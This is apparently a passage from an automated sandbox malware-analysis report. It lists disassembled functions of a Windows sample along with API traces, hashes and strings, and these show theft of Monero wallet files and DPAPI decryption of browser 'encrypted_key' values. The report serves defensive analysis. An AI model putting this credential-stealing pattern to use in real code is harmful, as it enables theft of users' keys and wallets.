                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                    • String ID:
                    • API String ID: 211194620-0
                    • Opcode ID: ea189af2326d893e89717b926fac8e1e9646eeb19d577e6cd7a8b1b1df44c0fc
                    • Instruction ID: a2349fd213a706ac3c828e9b21bd9d622de5ba841e1a3b936be68ed60a1c67ce
                    • Opcode Fuzzy Hash: ea189af2326d893e89717b926fac8e1e9646eeb19d577e6cd7a8b1b1df44c0fc
                    • Instruction Fuzzy Hash: EE91DA7291060C9BDB16EBA4DC96FEE7738AF14308F50416DF506EA091EF346E09DB62
                    Function 003BD780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                      • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                      • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                      • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                      • Part of subcall function 003C8B60: GetSystemTime.KERNEL32(003D0E1A,0118E838,003D05AE,?,?,003B13F9,?,0000001A,003D0E1A,00000000,?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003C8B86
                      • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                      • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 003BD801
                    • lstrlen.KERNEL32(00000000), ref: 003BD99F
                    • lstrlen.KERNEL32(00000000), ref: 003BD9B3
                    • DeleteFileA.KERNEL32(00000000), ref: 003BDA32
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                    • String ID:
                    • API String ID: 211194620-0
                    • Opcode ID: ce1c3df62e164ab89c21eba519cce1b68cd5d9d76cc6044fb9958d8ce220de39
                    • Instruction ID: 253ac9c01c77773b389115077990a05e9d41a1f7c9906855fa44cff7bb934692
                    • Opcode Fuzzy Hash: ce1c3df62e164ab89c21eba519cce1b68cd5d9d76cc6044fb9958d8ce220de39
                    • Instruction Fuzzy Hash: CB81DB7291060C9BDB06FBA4DC96EEE7738AF14308F50452DF506EA091EF346E09DB62
                    Function 003BF4A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 003CA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003CA7E6
                      • Part of subcall function 003B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003B99EC
                      • Part of subcall function 003B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003B9A11
                      • Part of subcall function 003B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003B9A31
                      • Part of subcall function 003B99C0: ReadFile.KERNEL32(000000FF,?,00000000,003B148F,00000000), ref: 003B9A5A
                      • Part of subcall function 003B99C0: LocalFree.KERNEL32(003B148F), ref: 003B9A90
                      • Part of subcall function 003B99C0: CloseHandle.KERNEL32(000000FF), ref: 003B9A9A
                      • Part of subcall function 003C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003C8E52
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                      • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                      • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                      • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                      • Part of subcall function 003CA920: lstrcpy.KERNEL32(00000000,?), ref: 003CA972
                      • Part of subcall function 003CA920: lstrcat.KERNEL32(00000000), ref: 003CA982
                    • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,003D1580,003D0D92), ref: 003BF54C
                    • lstrlen.KERNEL32(00000000), ref: 003BF56B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                    • String ID: ^userContextId=4294967295$moz-extension+++
                    • API String ID: 998311485-3310892237
                    • Opcode ID: 4eba89760b74ce8f3e519a61d7652abb7368cb4ebec50d74dc58d61693737b9b
                    • Instruction ID: 4ed6f56935f831d15694e7fefe7216654275f430f9b048c4611822ee298e9421
                    • Opcode Fuzzy Hash: 4eba89760b74ce8f3e519a61d7652abb7368cb4ebec50d74dc58d61693737b9b
                    • Instruction Fuzzy Hash: DA510071D0060CABDB05FBA0EC56EED7779AF54304F40852DF916AA191EE346E09CBA2
                    Function 003C70D0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 140COMMON
                    Download Yara Rule
                    Strings
                    • s<, xrefs: 003C7111
                    • s<, xrefs: 003C72AE, 003C7179, 003C717C
                    • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 003C718C
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy
                    • String ID: s<$s<$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                    • API String ID: 3722407311-1540657006
                    • Opcode ID: 16a49d6a533f3ac260dc06afae98c432fb4b0b795f830a90a47cff446abe4a8d
                    • Instruction ID: de08e2e369296fdbfdfce7542936f0f2650135f40a38a31dec75f85b883ecec3
                    • Opcode Fuzzy Hash: 16a49d6a533f3ac260dc06afae98c432fb4b0b795f830a90a47cff446abe4a8d
                    • Instruction Fuzzy Hash: 5A5180B1C042089BDB25EBA0DC81FEEB7B4AF54304F1440ADE615B7281EB746E88CF55
                    Function 003C3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$lstrlen
                    • String ID:
                    • API String ID: 367037083-0
                    • Opcode ID: 77b69d142564e516395d16f6053222947c6c5197133c644826f3b5220e7703e5
                    • Instruction ID: f12c6d1ee8c110b390c2d1f8f4edde97de043c25175890c5e344b58511256fc0
                    • Opcode Fuzzy Hash: 77b69d142564e516395d16f6053222947c6c5197133c644826f3b5220e7703e5
                    • Instruction Fuzzy Hash: F7411EB5D10209ABCB05EFE4D885FEEB778AB54704F10841DE416AB290DB75AA05CFA2
                    Function 003B9CE0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                      • Part of subcall function 003B99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003B99EC
                      • Part of subcall function 003B99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003B9A11
                      • Part of subcall function 003B99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003B9A31
                      • Part of subcall function 003B99C0: ReadFile.KERNEL32(000000FF,?,00000000,003B148F,00000000), ref: 003B9A5A
                      • Part of subcall function 003B99C0: LocalFree.KERNEL32(003B148F), ref: 003B9A90
                      • Part of subcall function 003B99C0: CloseHandle.KERNEL32(000000FF), ref: 003B9A9A
                      • Part of subcall function 003C8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003C8E52
                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 003B9D39
                      • Part of subcall function 003B9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N;,00000000,00000000), ref: 003B9AEF
                      • Part of subcall function 003B9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,003B4EEE,00000000,?), ref: 003B9B01
                      • Part of subcall function 003B9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N;,00000000,00000000), ref: 003B9B2A
                      • Part of subcall function 003B9AC0: LocalFree.KERNEL32(?,?,?,?,003B4EEE,00000000,?), ref: 003B9B3F
                      • Part of subcall function 003B9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 003B9B84
                      • Part of subcall function 003B9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 003B9BA3
                      • Part of subcall function 003B9B60: LocalFree.KERNEL32(?), ref: 003B9BD3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                    • String ID: $"encrypted_key":"$DPAPI
                    • API String ID: 2100535398-738592651
                    • Opcode ID: 3666e70a0ee23c83c961fdf54b40cc23e7c21fbc01317fe630b307168bd3f6df
                    • Instruction ID: 263aa57cc9367ecb87cf95e1c90682ff8fe65882a5ccad89c28db95cfcfa57aa
                    • Opcode Fuzzy Hash: 3666e70a0ee23c83c961fdf54b40cc23e7c21fbc01317fe630b307168bd3f6df
                    • Instruction Fuzzy Hash: E23110B6D1020DABCF15DBE4DC85FEEB7B8BB48308F14451AEB05A7241E7359A04CBA1
                    Function 003C8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 003CA740: lstrcpy.KERNEL32(003D0E17,00000000), ref: 003CA788
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,003D05B7), ref: 003C86CA
                    • Process32First.KERNEL32(?,00000128), ref: 003C86DE
                    • Process32Next.KERNEL32(?,00000128), ref: 003C86F3
                      • Part of subcall function 003CA9B0: lstrlen.KERNEL32(?,01188940,?,\Monero\wallet.keys,003D0E17), ref: 003CA9C5
                      • Part of subcall function 003CA9B0: lstrcpy.KERNEL32(00000000), ref: 003CAA04
                      • Part of subcall function 003CA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003CAA12
                      • Part of subcall function 003CA8A0: lstrcpy.KERNEL32(?,003D0E17), ref: 003CA905
                    • CloseHandle.KERNEL32(?), ref: 003C8761
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                    • String ID:
                    • API String ID: 1066202413-0
                    • Opcode ID: c48630a78019bdc9835dca8b2b0a46fc49ecea198ea0cbc0405b44f2344575ea
                    • Instruction ID: 309c1f561a85c6cfd6618800c09c82f851f31b100b83aa8be8b44db77f525d4f
                    • Opcode Fuzzy Hash: c48630a78019bdc9835dca8b2b0a46fc49ecea198ea0cbc0405b44f2344575ea
                    • Instruction Fuzzy Hash: E7315C71901618ABCB26EB50DC45FEEB778EF45704F10419DE50AE61A0DF346E45CFA2
                    Function 003C7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,003D0E00,00000000,?), ref: 003C79B0
                    • RtlAllocateHeap.NTDLL(00000000), ref: 003C79B7
                    • GetLocalTime.KERNEL32(?,?,?,?,?,003D0E00,00000000,?), ref: 003C79C4
                    • wsprintfA.USER32 ref: 003C79F3
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateLocalProcessTimewsprintf
                    • String ID:
                    • API String ID: 377395780-0
                    • Opcode ID: a14c5ccbbf77041d7aeb5617ec9d67b3c9b55fbca32e7f18ee379ee270fc9076
                    • Instruction ID: 0fdebe0e43635d5d2503d0587a961c631e65f6cb5795419088d0bb46351dd7e5
                    • Opcode Fuzzy Hash: a14c5ccbbf77041d7aeb5617ec9d67b3c9b55fbca32e7f18ee379ee270fc9076
                    • Instruction Fuzzy Hash: 2E1115B2904118ABCB149FC9DD45BBEB7F8FB48B11F10421AF605E2280E2795944DBB2
                    Function 003CC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • __getptd.LIBCMT ref: 003CC74E
                      • Part of subcall function 003CBF9F: __amsg_exit.LIBCMT ref: 003CBFAF
                    • __getptd.LIBCMT ref: 003CC765
                    • __amsg_exit.LIBCMT ref: 003CC773
                    • __updatetlocinfoEx_nolock.LIBCMT ref: 003CC797
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                    • String ID:
                    • API String ID: 300741435-0
                    • Opcode ID: bcdb634c7a3eb1376faa62abdadd804548b8f7411635f8e6a8172f7f199555e7
                    • Instruction ID: c51286c3d6e5bdf1fc6bbae6aad283d273d37148f361f4034b19d5e0ac6673c2
                    • Opcode Fuzzy Hash: bcdb634c7a3eb1376faa62abdadd804548b8f7411635f8e6a8172f7f199555e7
                    • Instruction Fuzzy Hash: 64F090329156149FDB23BBB86C07F5DB3A0AF00724F25514DF408EE2D2CB645D409F56
                    Function 003C4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 003C8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003C8E0B
                    • lstrcat.KERNEL32(?,00000000), ref: 003C4F7A
                    • lstrcat.KERNEL32(?,003D1070), ref: 003C4F97
                    • lstrcat.KERNEL32(?,01188A70), ref: 003C4FAB
                    • lstrcat.KERNEL32(?,003D1074), ref: 003C4FBD
                      • Part of subcall function 003C4910: wsprintfA.USER32 ref: 003C492C
                      • Part of subcall function 003C4910: FindFirstFileA.KERNEL32(?,?), ref: 003C4943
                      • Part of subcall function 003C4910: StrCmpCA.SHLWAPI(?,003D0FDC), ref: 003C4971
                      • Part of subcall function 003C4910: StrCmpCA.SHLWAPI(?,003D0FE0), ref: 003C4987
                      • Part of subcall function 003C4910: FindNextFileA.KERNEL32(000000FF,?), ref: 003C4B7D
                      • Part of subcall function 003C4910: FindClose.KERNEL32(000000FF), ref: 003C4B92
                    Memory Dump Source
                    • Source File: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                    • Associated: 00000000.00000002.2238019325.00000000003B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000461000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238045865.00000000005FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.000000000060E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.0000000000899000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238243555.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238525481.00000000008B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2238666145.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3b0000_file.jbxd
                    Yara matches
                    Similarity
